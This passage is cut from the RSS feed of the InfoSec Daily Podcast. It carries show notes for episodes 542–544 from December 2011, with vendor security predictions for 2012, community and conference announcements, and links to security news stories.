	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.maximumpc.com/article/news/fortinet_reveals_top_8_security_predictions_2012"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Fortinet</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ransomware to Take Mobile Devices Hostage</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.websense.com/assets/reports/2012-Predictions-WS-Security-Labs.pdf"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Websense</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Your Social Media Identity May Prove More Valuable To Cybercriminals Than Your Credit Cards</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.m86security.com/documents/pdfs/security_labs/m86_security_labs_predictions_2012.pdf"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">M86 Security</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Targeted Attacks Grow More Damaging and Complex &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.schwartzmsl.com/tangledweb/2011/12/the-future-of-security-top-fiv.php"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Tangled Web</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Advanced persistent threats (APTs) will become more predominant </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">7.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.thetechherald.com/articles/2012-Predictions-Wombat-Security-Technologieshttp:/www.thetechherald.com/articles/2012-Predictions-Wombat-Security-Technologies"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Wombat Security</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A variety of popular mobile devices will flood the enterprise, forcing IT departments to make users more accountable for their devices </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">8. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.businesscomputingworld.co.uk/top-9-cyber-security-trends-for-2012/"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Imperva</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security trumps compliance</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">9. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.businesscomputingworld.co.uk/top-5-security-predictions-for-2012/"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Tufin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Firewall operations </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">10.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://blog.lumension.com/4002/top-5-predictions-for-2012/"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Lumension</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More Malware </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-544-biggest-threat-gps-dos-government-malware-emporium-3rd-party-faux-pas-top-10-most-secure-browser/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3263/0/infosec-daily-podcast-episode-544.mp3" length="24100700" type="audio/mpeg" />
		<itunes:duration>0:49:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 544 for December 12, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 544 for December 12, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	SOLD OUT!!
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.theinquirer.net/inquirer/news/2128938/hacktivsim-risen-expectations
	NO ONE could have foreseen the rise of hacktivism in the last year, and groups like Anonymous pose a growing threat to end users, according to chief security researcher at F-Secure Mikko Hypponen.
	Hypponen said that there are three groups that present internet security threats &#8211; criminals, hacktivists and governments.
	When asked by the INQUIRER which was the biggest threat to the individual, Hypponen said, &#34;For the average end user, nation state attacks won&#39;t affect them at all. They have nothing to steal from you.&#34;
	He added, &#34;Criminals are a big threat but hacktivists are growing. A year ago it was isolated attacks on things like the Scientology religion but [hacktivists] started to make headlines with Wikileaks, when Anonymous came out to defend the whistle blowing site.&#34;
	Hypponen said that typical hacktivist attacks such as leaking a web site&#39;s database including passwords &#34;will affect the end user&#34;, especially if the end user re-uses their passwords.
	He added, &#34;This is a problem we didn&#39;t see happening. We weren&#39;t expecting Anonymous to be as big. Anonymous isn&#39;t going away. It is largely fuelled by this next generation that grew up with the net. The internet is as natural to them as breathing air.&#34;
	Hypponen thinks that eventually Anonymous will end up splitting into groups, which is how the offshoot Lulzsec was formed. He said, &#34;The only thing that connects these operations [is that] Anonymous is a brand &#8211; it&#39;s an open brand and anyone can take it.&#34;
	Source: http://www.businessweek.com/news/2011-12-09/falcone-s-lightsquared-said-to-disrupt-75-of-gps-in-tests.html
	Philip Falcone&#8217;s proposed LightSquared Inc. wireless service caused interference to 75 percent of global-positioning system receivers examined in a U.S. government test, according[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 543 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-543-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-543-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 11 Dec 2011 03:28:51 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3259</guid>
		<description><![CDATA[&#160; Episode 543 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 543 for December 10, 2011. &#160;&#160;Tonight&#039;s podcast is hosted by Dr. b0n3z and Boris Sverdlik. &#160; Guests: Hackett, Warrax, and Spridel. &#160; &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent">
<p><span>Episode 543 &#8211; Weekend Wrap-up with Dr. b0n3z</span><span> </span><br />
		<span>InfoSec Daily Podcast Episode 543 for December 10, 2011. &nbsp;&nbsp;Tonight&#039;s podcast is hosted by Dr. b0n3z and Boris Sverdlik.</span></p>
<p>&nbsp;</p>
<p><span>Guests: Hackett, Warrax, and Spridel.</span></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Announcements:</span></p>
<p><span>Brad Smith (theNurse)</span><br />
		<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p><span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p><a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
		<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p><span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
		<span>When: Starts January 24, 2012</span><br />
		<span>Where: Atlanta, GA</span><br />
		<span>Discount Code:</span><br />
		<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p><span>ShmooCon 2012</span><br />
		<span>When: January 27th-29th, 2012</span><br />
		<span>Registration: January 2nd at Midnight <img src='http://www.isdpodcast.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </span><br />
		<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
		<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a></p>
<p><span>Thotcon 0&#215;3</span><br />
		<span>When: Friday April 27th, 2012</span><br />
		<span>Where: Secret location in Chicago</span><br />
		<a href="http://tickets.thotcon.org/"><span>http://tickets.thotcon.org/</span></a><br />
		<span>Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p><span>Linuxfest Northwest 2012</span><br />
		<span>When: Saturday, April 28th-29th, 2012</span><br />
		<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
		<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
		<span>CFP now open!</span></p>
<p><span>AIDE 2012</span><br />
		<span>When: May 21-25, 2012</span><br />
		<span>Where: MU Forensic Science Center</span><br />
		<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
		<span>CFP now open!</span></p>
<p><span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
		<span>When: &nbsp;September 27-30, 2012</span><br />
		<span>Where: Louisville, KY</span><br />
		<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p><span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p><span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Stories</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: &nbsp;</span><a href="http://news.yahoo.com/thwart-porn-colleges-buying-xxx-sites-193653013.html"><span>http://news.yahoo.com/thwart-porn-colleges-buying-xxx-sites-193653013.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source:</span><span> </span><a href="http://www.f-secure.com/weblog/archives/00002279.html"><span>http://www.f-secure.com/weblog/archives/00002279.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: </span><a href="http://www.webpronews.com/sopa-open-2011-12"><span>http://www.webpronews.com/sopa-open-2011-12</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: </span><a href="http://www.computerworld.com/s/article/print/9222518/Microsoft_We_can_remotely_delete_Windows_8_apps"><span>http://www.computerworld.com/s/article/print/9222518/Microsoft_We_can_remotely_delete_Windows_8_apps</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: </span><a href="http://www.securityweek.com/new-research-says-chrome-browser-most-secured-against-attacks"><span>http://www.securityweek.com/new-research-says-chrome-browser-most-secured-against-attacks</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source:</span><span> </span><a href="http://www.securityweek.com/researchers-confirm-attackers-targeted-defense-firms-adobe-reader-zero-day"><span>http://www.securityweek.com/researchers-confirm-attackers-targeted-defense-firms-adobe-reader-zero-day</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source:</span><span> </span><a href="http://paulsparrows.wordpress.com/2011/12/10/another-certification-authority-breached-the-12th/"><span>http://paulsparrows.wordpress.com/2011/12/10/another-certification-authority-breached-the-12th/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: </span><a href="http://linux-news.org/index.php/2011/12/09/top-10-wireshark-filters/"><span>http://linux-news.org/index.php/2011/12/09/top-10-wireshark-filters/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: </span><a href="http://www.ajc.com/news/gwinnett/ambulances-turned-away-as-1255750.html"><span>http://www.ajc.com/news/gwinnett/ambulances-turned-away-as-1255750.html</span></a></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-543-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3259/0/infosec-daily-podcast-episode-543.mp3" length="21970188" type="audio/mpeg" />
		<itunes:duration>0:45:46</itunes:duration>
		<itunes:subtitle>&#160;

Episode 543 &#8211; Weekend Wrap-up with Dr. b0n3z 
		InfoSec Daily Podcast Episode 543 for December 10, 2011. &#160;&#160;Tonight&#039;s podcast is hosted by Dr. b0n3z and Boris Sverdlik.
&#160;
Guests: Hackett, Warrax, and Spridel.
&#160;
[...]</itunes:subtitle>
		<itunes:summary>&#160;

Episode 543 &#8211; Weekend Wrap-up with Dr. b0n3z 
		InfoSec Daily Podcast Episode 543 for December 10, 2011. &#160;&#160;Tonight&#039;s podcast is hosted by Dr. b0n3z and Boris Sverdlik.
&#160;
Guests: Hackett, Warrax, and Spridel.
&#160;
&#160;
Announcements:
Brad Smith (theNurse)
		We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
		http://www.social-engineer.org/bradsmithdonation/
SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
		When: Starts January 24, 2012
		Where: Atlanta, GA
		Discount Code:
		http://www.sans.org/mentor/details.php?nid=25484
ShmooCon 2012
		When: January 27th-29th, 2012
		Registration: January 2nd at Midnight  
		Where: Washington Hilton Hotel, Washington, DC
		http://www.shmoocon.org
Thotcon 0&#215;3
		When: Friday April 27th, 2012
		Where: Secret location in Chicago
		http://tickets.thotcon.org/
		Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
Linuxfest Northwest 2012
		When: Saturday, April 28th-29th, 2012
		Where: Bellingham Technical College &#8211; Bellingham, WA
		http://www.linuxfestnorthwest.org/
		CFP now open!
AIDE 2012
		When: May 21-25, 2012
		Where: MU Forensic Science Center
		http://aide.marshall.edu
		CFP now open!
DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
		When: &#160;September 27-30, 2012
		Where: Louisville, KY
		http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
Stories
&#160;
Source: &#160;http://news.yahoo.com/thwart-porn-colleges-buying-xxx-sites-193653013.html
&#160;
Source: http://www.f-secure.com/weblog/archives/00002279.html
&#160;
Source: http://www.webpronews.com/sopa-open-2011-12
&#160;
Source: http://www.computerworld.com/s/article/print/9222518/Microsoft_We_can_remotely_delete_Windows_8_apps
&#160;
Source: http://www.securityweek.com/new-research-says-chrome-browser-most-secured-against-attacks
&#160;
Source: http://www.securityweek.com/researchers-confirm-attackers-targeted-defense-firms-adobe-reader-zero-day
&#160;
Source: http://paulsparrows.wordpress.com/2011/12/10/another-certification-authority-breached-the-12th/
&#160;
Source: http://linux-news.org/index.php/2011/12/09/top-10-wireshark-filters/
&#160;
Source: http://www.ajc.com/news/gwinnett/ambulances-turned-away-as-1255750.html
</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 542 &#8211; Subway Skimmers, AT&amp;T&amp;T, How Not to Get Pirated Software, Google IPv6, HBGary and Insecure HP Printers</title>
		<link>http://www.isdpodcast.com/episode-542-subway-skimmers-attt-how-not-to-get-pirated-software-google-ipv6-hbgary-and-insecure-hp-printers</link>
		<comments>http://www.isdpodcast.com/episode-542-subway-skimmers-attt-how-not-to-get-pirated-software-google-ipv6-hbgary-and-insecure-hp-printers#comments</comments>
		<pubDate>Sat, 10 Dec 2011 02:03:34 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3254</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 542 for December 9, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma. Special Guest: Johnny Cocaine &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.9240012016100929" style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 542 for December 9, 2011. &nbsp;&nbsp;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.</span></p>
<p>	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Special Guest: Johnny Cocaine</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
